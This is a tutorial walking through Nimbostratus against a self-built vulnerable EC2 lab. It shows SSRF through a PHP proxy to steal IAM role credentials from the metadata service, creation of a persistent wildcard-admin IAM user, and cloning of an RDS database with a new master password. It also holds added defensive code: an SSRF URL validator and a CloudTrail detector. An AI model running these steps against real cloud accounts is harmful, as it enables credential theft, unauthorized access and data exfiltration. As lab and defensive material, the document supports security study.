Introduction
Nimbostratus is a tool developed by Andres Riancho for fingerprinting and exploiting Amazon cloud infrastructure. It uses an application-level HTTP proxy vulnerability to enumerate the instance and its credentials from the metadata service, which is available to every instance in EC2. The tool-set can be tested against nimbostratus-target, which helps you set up a legal environment in which the enumeration can be performed. If you were wondering what Nimbostratus means, it is the name of an actual cloud type. In this article, we will see how to install Nimbostratus and nimbostratus-target, set up the target environment, and then enumerate the target for further exploitation.
Installation
Installing Nimbostratus
git clone git@github.com:andresriancho/nimbostratus.git
cd nimbostratus
pip install -r requirements.txt
Installing nimbostratus-target
sudo apt-get install python-mysqldb
git clone git@github.com:andresriancho/nimbostratus-target.git
cd nimbostratus-target
pip install -r requirements.txt
Prerequisites
Amazon AWS account:
The primary requirement for testing Nimbostratus is an AWS account with access keys. You can create a free AWS account; please read the limitations of the free tier account first to avoid unexpected charges.
Creating a user:
To create a user, select Users from the left-hand pane of the IAM management console. Create a new user and assign Programmatic access. On the following page, select Attach existing policies directly and assign a policy such as AdministratorAccess. Go to the next page, review your chosen options and proceed to create the user.
Creating your access keys:
These are the access keys required for the post-exploitation steps. Once the user is created you will receive its credentials, which consist of an access key and a secret key. You can also view the access credentials later by selecting the user that was created.
Boto library:
Boto is a Python package that provides interfaces to Amazon Web Services. Currently, all features work with Python 2.6 and 2.7. Nimbostratus is built on the boto library for accessing Amazon's API.
Usage
Dump EC2 meta-data
This function depends on the metadata service and on a web application with an HTTP proxy vulnerability running on the instance. Once the HTTP proxy is exploited, the vulnerability can be used to send requests to the metadata service from the attacker's machine. For this demonstration, we will set up a simple Ubuntu instance running Apache and PHP with a web app that exposes a vulnerable proxy function.
Setting up the target instance
In this demo we create our own target rather than using nimbostratus-target; the same operations can be performed on an instance set up with nimbostratus-target. The first step is to create an IAM role, which will be attached to a new EC2 instance running Ubuntu. Launch the instance from the EC2 AWS console with that IAM role configured.
Next, we have to set up a vulnerable web app on the target machine. For this demo, we create a PHP file with an unvalidated proxy function: a simple PHP proxy script (greenido's php proxy script from here) saved as index.php inside the /var/www/html folder. Log into the instance using ssh, navigate to /var/www/html and run the following steps:
sudo apt install apache2
sudo apt install php
sudo chmod -R a+rw /var/www
cd /var/www/html
curl https://gist.githubusercontent.com/greenido/2689639/raw/d95439f6dff5b8d0964366e69106226133900f9b/cUrl_proxy.php >> index.php
sudo service apache2 restart
Now we have an EC2 instance running a vulnerable HTTP web proxy. greenido's PHP script takes a 'url' parameter containing the URL to be fetched through the proxy.
We can test this by opening the public IP address of the instance in the browser on our machine (the attacker's machine).
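The check that the proxy script above lacks, written in Python rather than PHP so it matches the rest of this article's tooling. This is an added example, not code from the article or from Nimbostratus; the allow-list and the injectable resolver parameter are assumptions for illustration.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


def _is_public(address):
    """True only for globally routable addresses. ipaddress' is_global rejects
    169.254.0.0/16 (the metadata service lives at 169.254.169.254), 127/8,
    10/8, 172.16/12, 192.168/16, fc00::/7 and the other reserved ranges."""
    return ipaddress.ip_address(address).is_global


def check_proxy_target(url, allowed_hosts=None, resolver=socket.getaddrinfo):
    """Return (ok, reason) for a caller-supplied proxy destination.

    allowed_hosts: optional allow-list of hostnames; the preferred control.
    resolver: injectable for testing; defaults to the system resolver.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    host = parts.hostname
    if not host or parts.username or parts.password:
        return False, "missing host or credentials in URL"
    if allowed_hosts is not None and host not in allowed_hosts:
        return False, "host not on allow-list"
    try:
        # Check *every* record: a name with one public and one link-local
        # answer is still a way to reach the metadata service.
        addresses = {info[4][0] for info in resolver(host, None)}
    except socket.gaierror:
        return False, "host does not resolve"
    for address in addresses:
        if not _is_public(address):
            return False, "resolves to non-public address " + address
    return True, "ok"
```

The proxy should then connect to the address it just validated rather than resolving the name a second time, so a DNS answer cannot change between the check and the request.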
Fingerprinting using dump-ec2-metadata function
Now we have a vulnerable EC2 instance that will act as the target for our demonstration.
Nimbostratus has a Python file called mangle.py inside the core/utils folder which has to be updated with the target URL. Insert the target's vulnerable proxy URL in the VULN_URL variable and save the file. Now, let's run the dump-ec2-metadata function using the updated mangle function.
./nimbostratus -v dump-ec2-metadata --mangle-function=core.utils.mangle.mangle
Nimbostratus queries the instance's metadata service to gather all the data that is available.
We can see that the dump-ec2-metadata function of Nimbostratus dumps all the data available on the metadata server. The output also contains other juicy information, such as the access key and secret of the IAM role attached to this instance.
Dump credentials:
This function enumerates the metadata service of the target using the mangle function and retrieves any access key credentials found on the metadata server.
./nimbostratus -v dump-credentials --mangle-function=core.utils.mangle.mangle
Once we have enumerated the access keys of the IAM role attached to the instance, we can enumerate the permissions of that IAM role using the dump-permissions function.
Dump permissions:
This function dumps all permissions for the provided credentials and is best used right after dump-credentials to learn which permissions are available to you. Assuming the IAM role has a lenient policy, a successful execution of the command would look like:
./nimbostratus dump-permissions --access-key=**************PXXQ --secret-key=******************************** --token ********************************************
Create a new user:
During exploitation, if you obtained the credentials of a root user, or if the IAM role had an administrative access policy attached to it, you can create a new user through IAM. This function creates the user, assigns it permissions to access all Amazon resources and returns the access key and secret. It gives the created user a random name and attaches a policy that looks like this:
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": "*",
            "Resource": "*"
        }
    ]
}
We execute this command to demonstrate its function:
./nimbostratus -v create-iam-user --access-key **************UFUA --secret-key **************************************DDxSZ --token ****************************************tecaoI
We can see the new user created in the IAM console.
This user account can be used for further exploitation and for maintaining access to the resources.
Create a Database Snapshot:
Amazon RDS (Amazon Relational Database Service) makes it easy to set up, operate, and scale a relational database in the cloud. It provides cost-efficient and resizable capacity while automating time-consuming administration tasks such as hardware provisioning, database setup, patching and backups.
To test this section, create a DB instance in RDS. Make sure you follow the details at https://aws.amazon.com/rds/free/ to create a DB instance under the Amazon Free Tier.
The snapshot-rds function creates a snapshot of a DB instance running in AWS RDS and restores the snapshot to a new DB instance with a user-provided master password. This lets the user access the contents of the database instance without knowing the original master password. Please note that the latest AWS API versions do not support modifying the VPC information of the DB instance; use API versions between 2012-01-15 and 2012-10-31 for that functionality.
We need to know whether a DB instance is running in the AWS account, its name, and its region. We will use the admin user account created with the create-iam-user function in the previous step. We also provide the master password for the cloned DB instance, which we can use later to connect to it.
./nimbostratus -v snapshot-rds --access-key ********AUFUA --secret-key *****************************yDDxSZ --token ************************************************K2g2QU= --rds-name testdb --password ********* --region us-west-2
This creates a snapshot and restores that snapshot as a separate instance in RDS.
Nimbostratus can also create a VPC on the RDS instance which allows anyone on the internet to access it as root with the password provided.
This cloned RDS instance can be connected to remotely from the attacker's machine using the instance details and the password we provided, and the database can then be used for exploitation.
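As an added example that is not part of Nimbostratus or this article, a CloudTrail detection for the API-call sequences that the create-iam-user and snapshot-rds functions above leave behind. The trimmed records are constructed, and treating a ModifyDBInstance call with publiclyAccessible set as the sign of the internet exposure described above is an assumption.

```python
import json
from collections import defaultdict
# Constructed, trimmed CloudTrail records (oldest first): the two tool runs
# described above, then one benign key rotation by a human administrator.
ROLE = "arn:aws:sts::111122223333:assumed-role/web-role/i-0abc12345"
WILDCARD = '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Action":"*","Resource":"*"}]}'
SAMPLE_EVENTS = [
    {"eventName": "CreateUser", "userIdentity": {"arn": ROLE}, "requestParameters": {"userName": "xk3j9q"}},
    {"eventName": "PutUserPolicy", "userIdentity": {"arn": ROLE}, "requestParameters": {"userName": "xk3j9q", "policyDocument": WILDCARD}},
    {"eventName": "CreateAccessKey", "userIdentity": {"arn": ROLE}, "requestParameters": {"userName": "xk3j9q"}},
    {"eventName": "CreateDBSnapshot", "userIdentity": {"arn": ROLE}, "requestParameters": {"dBInstanceIdentifier": "testdb"}},
    {"eventName": "RestoreDBInstanceFromDBSnapshot", "userIdentity": {"arn": ROLE}, "requestParameters": {"dBInstanceIdentifier": "testdb-clone"}},
    {"eventName": "ModifyDBInstance", "userIdentity": {"arn": ROLE}, "requestParameters": {"dBInstanceIdentifier": "testdb-clone", "publiclyAccessible": True}},
    {"eventName": "CreateAccessKey", "userIdentity": {"arn": "arn:aws:iam::111122223333:user/ops"}, "requestParameters": {"userName": "ops"}},
]
# Ordered API-call patterns the two Nimbostratus functions leave behind.
SEQUENCES = {
    "create-iam-user": ("CreateUser", "PutUserPolicy", "CreateAccessKey"),
    "snapshot-rds": ("CreateDBSnapshot", "RestoreDBInstanceFromDBSnapshot", "ModifyDBInstance"),
}

def _as_list(value):
    return value if isinstance(value, list) else [value]

def is_wildcard_policy(document):
    """True when an Allow statement grants Action "*" on Resource "*"."""
    statements = _as_list(json.loads(document).get("Statement", []))
    return any(s.get("Effect") == "Allow" and "*" in _as_list(s.get("Action"))
               and "*" in _as_list(s.get("Resource")) for s in statements)

def is_relevant(event):
    """PutUserPolicy counts only with a wildcard document; ModifyDBInstance only
    when it makes the instance public (assumed to be how exposure is logged)."""
    name, params = event["eventName"], event.get("requestParameters") or {}
    if name == "PutUserPolicy":
        return is_wildcard_policy(params.get("policyDocument", "{}"))
    if name == "ModifyDBInstance":
        return params.get("publiclyAccessible") is True
    return any(name in pattern for pattern in SEQUENCES.values())

def _is_subsequence(pattern, names):
    it = iter(names)  # one shared iterator: order is enforced, gaps are allowed
    return all(any(n == step for n in it) for step in pattern)

def find_sequences(events):
    """Return (identity arn, label) for each identity that completed a pattern."""
    calls = defaultdict(list)
    for event in events:
        if is_relevant(event):
            calls[event["userIdentity"]["arn"]].append(event["eventName"])
    return [(arn, label) for arn, names in calls.items()
            for label, pattern in SEQUENCES.items() if _is_subsequence(pattern, names)]
```

A single CreateAccessKey or snapshot call never fires on its own; only the full ordered chain from one identity does, which keeps routine administration out of the alert.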
Conclusion
Nimbostratus is an amazing post-exploitation tool for enumerating and fingerprinting AWS resources. It can also exploit instances that run tools such as Celery with insecure default configurations. Thank you for reading! – Setu Parimi, Steve George & Indranil Roy